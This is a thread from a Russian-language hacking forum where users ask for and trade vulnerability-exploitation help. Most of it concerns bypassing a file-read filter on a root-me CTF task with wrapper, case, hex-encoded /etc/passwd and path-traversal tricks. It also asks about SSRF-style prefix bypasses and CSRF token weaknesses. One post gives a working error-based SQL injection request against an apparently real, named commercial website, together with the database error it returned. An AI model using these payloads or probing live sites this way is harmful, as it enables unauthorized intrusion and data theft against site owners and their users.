Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Ну, пиши свой Линк с твоей проблемой
     
  2. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    парни посоветуйте книги для поиска и раскрутки sql injection
     
  3. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Есть читалка через file_get_contents, предварительно фильтр регуляркой через preg_match
    То что есть уязвимость уверен на 99%, т.к. это ctf машина

    фильтр
    Code:
    .php  (но в некоторых случаях пропускает, например customers/test'/a.php customers/test\a.php customers/test`a.php)
    ..
    ///
    <
    >
    не может начинаться со слеша
    не может содержать %
    data://
    expect://
    php://
    zip://
    zlib://
    phar://
    
    этих враперов нету
    rar://
    ogg://
    
    Знаю полный путь

    Пропускает file:// но три слеша не пускает чтобы указать полный путь, какие то фильтры в этом врапере вроде нельзя использовать, по крайней мере я не нашел как
     
  4. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    182
    Likes Received:
    549
    Reputations:
    83
    Регистр учитывает preg_match ? если нет то можно пробовать pHp://blabla.PhP и тд
    Пробовал так?
    \x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64
     
  5. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    На регистр ему плевать

    Сейчас попробовал, такое пропускает, но говорит что нет такого файла или папки. Пробовал /etc/passwd из твоего примера и тот путь что у меня есть.
    \x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64 если что вставлял как есть, без каких либо дополнений
     
  6. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    182
    Likes Received:
    549
    Reputations:
    83
    ну с path traversal пробуй, возможно он рассшаривает из текущей диры, нужно выше подниматься или пробовал так?
     
  7. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    182
    Likes Received:
    549
    Reputations:
    83
    еще если версия подходящая можно попробовать такое
    https://habr.com/ru/post/58560/
    если уязвимый код примерно такой, но это не точно

    PHP:
    <?php
    if (preg_match("/php/i"$string)) {
        die (
    "lol.");
    } else {
        
    file_get_contents($string);
    }
    ?>
     
    K800 likes this.
  8. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Пробовал, не срабатывает

    Еще пробовал перевести в формат \x то что изначально было в параметре, вроде
    customers.php?filename=test
    customers.php?filename=\x74\x65\x73\x74
    и он тоже выдает тогда что нету такого файла

    это точно можно просто в параметр пихать и file_get_contents его поймет?

    // Если хочешь могу дать ссылку в пм на эту ctf на root-me, и как быстро добраться до этой читалки
     
    #2748 trololoman96, 18 Dec 2019
    Last edited: 18 Dec 2019
  9. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    182
    Likes Received:
    549
    Reputations:
    83
    ну создай файлик на хосте:) во всяком случае должен)
    PHP:
    <?php
    $a 
    "сюда запиши hex";
    echo 
    file_get_contents($a);
    ?>
    а еще скинь линк на таск, поковыряюсь тоже)
     
  10. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Попробовал на виндовсе, апач, php 5.6.3 так же пишет что нет такого файла :D

    Как добраться до читалки скинул в пм
     
  11. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    182
    Likes Received:
    549
    Reputations:
    83
    ох уж этот виндовс)) на линь без вопросов, пых 7.3 тоже апач
     
    K800 likes this.
  12. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    php 5.6.40 и php 7.3.6 на линуксе тоже не сработало, хз в чем дело
     
  13. Axiles

    Axiles New Member

    Joined:
    14 Jan 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
  14. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    Да только толку мало, там фильтрует по длине потом и разрывает sel ect и fr om
    Code:
    Запрос
    https://gexs.ru/brands/1_orange/?section_id=1+AND+extractvalue(1,concat(0x3a,((select+table_name+from+information_schema+tables+limit+1,1))))
    
    Code:
    Ответ 
    Mysql query error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ect table_name fr om information_schema tables limit 1,1))))))
    
     
    Axiles likes this.
  15. Napas

    Napas Member

    Joined:
    30 Nov 2008
    Messages:
    40
    Likes Received:
    12
    Reputations:
    7
    hi everyone
    can i bypass http:// prefix and use wrappers or read files?
    Code:
    file_get_contents('http://'.$_GET["s"]);
    Code:
    $url = 'http://'.$_GET["s"];
    ...
    curl_setopt($handler, CURLOPT_URL, $url);
    ...
     
  16. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    550
    Likes Received:
    1,036
    Reputations:
    344
    nope
     
  17. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    476
    Likes Received:
    85
    Reputations:
    21
  18. Pop-Xlop

    Pop-Xlop Member

    Joined:
    26 Aug 2019
    Messages:
    19
    Likes Received:
    21
    Reputations:
    7
    А что собственно непонятно? В данном случае CSRF токен сверял идентичность параметров в заголовке и в куках, если одинаково - значит всё как надо. Классика идёт ещё со времен "защитных" капч. Уважаю таких разработчиков.

    Счастливой охоты на жуков. ;)
     
  19. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    476
    Likes Received:
    85
    Reputations:
    21
    Да, это понятно но как эксплуатируется такое? злоумышленник не знает что у жертвы в куках чтоб провесть CSRF
     
  20. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    476
    Likes Received:
    85
    Reputations:
    21
Loading...